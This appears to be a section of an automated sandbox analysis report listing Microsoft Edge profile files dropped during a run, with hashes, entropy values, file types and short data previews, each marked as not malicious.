                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                          MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                          SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                          SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                          SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.10256531216745096
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:+sGyhsGy2spEjVl/PnnnnnnnnnnnvoQ/Eou:+8GoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                          MD5:E2429526522C9C174A0DC3DA95ECB421
                                                                                                                                                                                                                                                                                          SHA1:5AE67BE3BD30E3B57B33FE9FB95AEC0CD9849DE3
                                                                                                                                                                                                                                                                                          SHA-256:B48AB381F2FCA1B021A2C6D34C580A9FABB3136882899FE4050F835B289132AE
                                                                                                                                                                                                                                                                                          SHA-512:1DB4062BADE3E3E774C0C3B67E0CF7D77230DF6C5D93FB0CD1E93268B4C6FF1A771EEEAD9B9E29C92ABE2DD9C273B4C0A945CA8C9A35D689BE760ECA089231B4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..-.............M..........kK.?.3.-.....+M..7ma5..-.............M..........kK.?.3.-.....+M..7ma5........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):317272
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8904832855277037
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:frjhPyd5PifxwfkxzUexYajxa9AxBLUxoS1o0xev84yEyGVyGylAyZxyF9:B/xFxzxlxhxaxrxTm
                                                                                                                                                                                                                                                                                          MD5:02C4971B55D4EDBC6BCD3D8411656684
                                                                                                                                                                                                                                                                                          SHA1:08CAA7FAF6EE784FF02E59178F69601FB86D1F1C
                                                                                                                                                                                                                                                                                          SHA-256:345D6532C61209E3FFB141C945A7A2D59024BC41B2F68533EA91A94C980955C5
                                                                                                                                                                                                                                                                                          SHA-512:15C6622BDE07C192A2E5A3736290C43297F6DE1142CF081AF30DF038D1047319C643612C62FF242D2B9AA396D5EE5637A90408152F87D80CFA3F308516D47BF3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:7....-..........3.-.......F`..........3.-......+..O.\SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):419
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.697458451967152
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuuuwnsedhOuM:llc8BOuuuuuuuuuuuuws8FM
                                                                                                                                                                                                                                                                                          MD5:8B56687329F70F8CEA3355F5B17DBE87
                                                                                                                                                                                                                                                                                          SHA1:7EFF693D450CAB6A6AE34496DAA43D0690391E84
                                                                                                                                                                                                                                                                                          SHA-256:80144B5D4780BCC79F02C1FC0227C7E3BD66470BCFE010CBD7527109C8502C09
                                                                                                                                                                                                                                                                                          SHA-512:08F6CB299926850C1945A596374CCF8431473B495E4D58BC9EBFF538E56A6989B90A81AB715B20F84960C3600273E66D3D0F283E951889E842EBD0D3FE737E5E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................p.0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.266736076243004
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Ro/UwE9+q2PcNwi23oH+TcwtfrK+IFUt8O8Ro/UwEJZmw+O8Roe9VkwOcNwi2R:7pI9+vLZYeb23FUt8OpIJ/+Ope9V54ZR
                                                                                                                                                                                                                                                                                          MD5:03D09B8EA16C6FF674EB3F71A653BC0E
                                                                                                                                                                                                                                                                                          SHA1:4E5545F3699631507800587FEE81C87B91F95E23
                                                                                                                                                                                                                                                                                          SHA-256:AD3F55EE49949CC1B96E8B264F16D66D27FC34F694B0365F6C0A6317FBAC49C8
                                                                                                                                                                                                                                                                                          SHA-512:9F368B5AE54E0EFEA71057165A39C98A7681D5C86E5E93A10A0639C1A18D31C7E93CCE745E49A6CC78D8FAF95B2ECEE052A8C5805FE3346E50F2DF8D870FC5C0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.369 19dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/19-03:45:53.369 19dc Recovering log #3.2024/12/19-03:45:53.370 19dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.266736076243004
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Ro/UwE9+q2PcNwi23oH+TcwtfrK+IFUt8O8Ro/UwEJZmw+O8Roe9VkwOcNwi2R:7pI9+vLZYeb23FUt8OpIJ/+Ope9V54ZR
                                                                                                                                                                                                                                                                                          MD5:03D09B8EA16C6FF674EB3F71A653BC0E
                                                                                                                                                                                                                                                                                          SHA1:4E5545F3699631507800587FEE81C87B91F95E23
                                                                                                                                                                                                                                                                                          SHA-256:AD3F55EE49949CC1B96E8B264F16D66D27FC34F694B0365F6C0A6317FBAC49C8
                                                                                                                                                                                                                                                                                          SHA-512:9F368B5AE54E0EFEA71057165A39C98A7681D5C86E5E93A10A0639C1A18D31C7E93CCE745E49A6CC78D8FAF95B2ECEE052A8C5805FE3346E50F2DF8D870FC5C0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.369 19dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/19-03:45:53.369 19dc Recovering log #3.2024/12/19-03:45:53.370 19dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):782
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                                                          MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                                                          SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                                                          SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                                                          SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):348
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.265574656704517
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Ro99+q2PcNwi23oH+TcwtfrzAdIFUt8O8RoxCNJZmw+O8RoxCN9VkwOcNwi23q:7p99+vLZYeb9FUt8OpxCNJ/+OpxCN9VD
                                                                                                                                                                                                                                                                                          MD5:13B1C3D1BF8DF840638C950EDA421CDA
                                                                                                                                                                                                                                                                                          SHA1:523A12A0B8661832EC607FC021AA893710DD2ECE
                                                                                                                                                                                                                                                                                          SHA-256:A0F43B15FCA47BA5FC300C8231895459590A80F443CE47A9FCEBD2C13F2716BA
                                                                                                                                                                                                                                                                                          SHA-512:EDFE0697BE05B9EE4EDE8AE105CF935A12A2524C6D79A7A867AC943EC37CCB3248F4BA5A4857DBDE95566EF768494780CD5BB06EA9C782F6FFE1FA6152DC3D9D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.366 19dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/19-03:45:53.367 19dc Recovering log #3.2024/12/19-03:45:53.367 19dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):348
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.265574656704517
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Ro99+q2PcNwi23oH+TcwtfrzAdIFUt8O8RoxCNJZmw+O8RoxCN9VkwOcNwi23q:7p99+vLZYeb9FUt8OpxCNJ/+OpxCN9VD
                                                                                                                                                                                                                                                                                          MD5:13B1C3D1BF8DF840638C950EDA421CDA
                                                                                                                                                                                                                                                                                          SHA1:523A12A0B8661832EC607FC021AA893710DD2ECE
                                                                                                                                                                                                                                                                                          SHA-256:A0F43B15FCA47BA5FC300C8231895459590A80F443CE47A9FCEBD2C13F2716BA
                                                                                                                                                                                                                                                                                          SHA-512:EDFE0697BE05B9EE4EDE8AE105CF935A12A2524C6D79A7A867AC943EC37CCB3248F4BA5A4857DBDE95566EF768494780CD5BB06EA9C782F6FFE1FA6152DC3D9D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:53.366 19dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/19-03:45:53.367 19dc Recovering log #3.2024/12/19-03:45:53.367 19dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):120
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                          MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                          SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                          SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                          SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                          MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                          SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                          SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                          SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):56066
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103039480185279
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynQPGWv/sxtw57VLyMV/YoskFoz:z/0+zI7yn0v/4KxVeZoskG
                                                                                                                                                                                                                                                                                          MD5:B38E93994A4E2C75078628A7A680A657
                                                                                                                                                                                                                                                                                          SHA1:1C2B8C37FE8B8036FEFA863DD15CC9440FC338DC
                                                                                                                                                                                                                                                                                          SHA-256:F3402F2A8B99B50129B48877CC53BB0E9253B9603975D056B23E8F0710D4C569
                                                                                                                                                                                                                                                                                          SHA-512:4EB38CCF7F086C1446B520B036974C5B05DECE1AD648D2C6A913DD8AE0C7F0E7C0703493ED2715FA5A1D6FE71013B3B91FB68C9DEAA9C772CD86D8422E690D7E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2b8f5.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):56066
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103039480185279
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynQPGWv/sxtw57VLyMV/YoskFoz:z/0+zI7yn0v/4KxVeZoskG
                                                                                                                                                                                                                                                                                          MD5:B38E93994A4E2C75078628A7A680A657
                                                                                                                                                                                                                                                                                          SHA1:1C2B8C37FE8B8036FEFA863DD15CC9440FC338DC
                                                                                                                                                                                                                                                                                          SHA-256:F3402F2A8B99B50129B48877CC53BB0E9253B9603975D056B23E8F0710D4C569
                                                                                                                                                                                                                                                                                          SHA-512:4EB38CCF7F086C1446B520B036974C5B05DECE1AD648D2C6A913DD8AE0C7F0E7C0703493ED2715FA5A1D6FE71013B3B91FB68C9DEAA9C772CD86D8422E690D7E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2b9a1.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):56066
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103039480185279
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynQPGWv/sxtw57VLyMV/YoskFoz:z/0+zI7yn0v/4KxVeZoskG
                                                                                                                                                                                                                                                                                          MD5:B38E93994A4E2C75078628A7A680A657
                                                                                                                                                                                                                                                                                          SHA1:1C2B8C37FE8B8036FEFA863DD15CC9440FC338DC
                                                                                                                                                                                                                                                                                          SHA-256:F3402F2A8B99B50129B48877CC53BB0E9253B9603975D056B23E8F0710D4C569
                                                                                                                                                                                                                                                                                          SHA-512:4EB38CCF7F086C1446B520B036974C5B05DECE1AD648D2C6A913DD8AE0C7F0E7C0703493ED2715FA5A1D6FE71013B3B91FB68C9DEAA9C772CD86D8422E690D7E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2baf9.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):56066
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103039480185279
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynQPGWv/sxtw57VLyMV/YoskFoz:z/0+zI7yn0v/4KxVeZoskG
                                                                                                                                                                                                                                                                                          MD5:B38E93994A4E2C75078628A7A680A657
                                                                                                                                                                                                                                                                                          SHA1:1C2B8C37FE8B8036FEFA863DD15CC9440FC338DC
                                                                                                                                                                                                                                                                                          SHA-256:F3402F2A8B99B50129B48877CC53BB0E9253B9603975D056B23E8F0710D4C569
                                                                                                                                                                                                                                                                                          SHA-512:4EB38CCF7F086C1446B520B036974C5B05DECE1AD648D2C6A913DD8AE0C7F0E7C0703493ED2715FA5A1D6FE71013B3B91FB68C9DEAA9C772CD86D8422E690D7E
                                                                                                                                                                                                                                                                                          Malicious:false
